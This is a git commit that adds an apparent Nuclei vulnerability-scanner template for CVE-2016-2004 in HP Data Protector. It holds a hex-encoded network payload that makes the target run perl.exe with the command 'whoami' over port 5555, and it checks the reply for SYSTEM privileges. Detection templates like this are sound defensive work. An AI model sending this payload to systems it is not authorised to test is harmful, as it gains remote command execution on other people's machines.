Merge pull request #2171 from pussycat0x/master

HP Data Protector A.09.00 - Arbitrary Command Execution
2021-07-25 22:15:09 +05:30 · 2021-07-25 22:15:09 +05:30 · 7af0c9c8b0
parent 355dc8e39b 4658f7ffcc
commit 7af0c9c8b0
1 changed files with 25 additions and 0 deletions
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@ -0,0 +1,25 @@
+id: CVE-2016-2004
+
+info:
+  name: HP Data Protector A.09.00 - Arbitrary Command Execution
+  author: pussycat0x
+  severity: critical
+  tags: cve,cve2016,network,iot,hp,rce
+  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
+  reference: |
+        - https://www.exploit-db.com/exploits/39858
+        - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+
+network:
+  - inputs:
+      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
+        type: hex
+
+    host:
+      - "{{Hostname}}:5555"
+
+    matchers:
+      - type: word
+        encoding: hex
+        words:
+          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system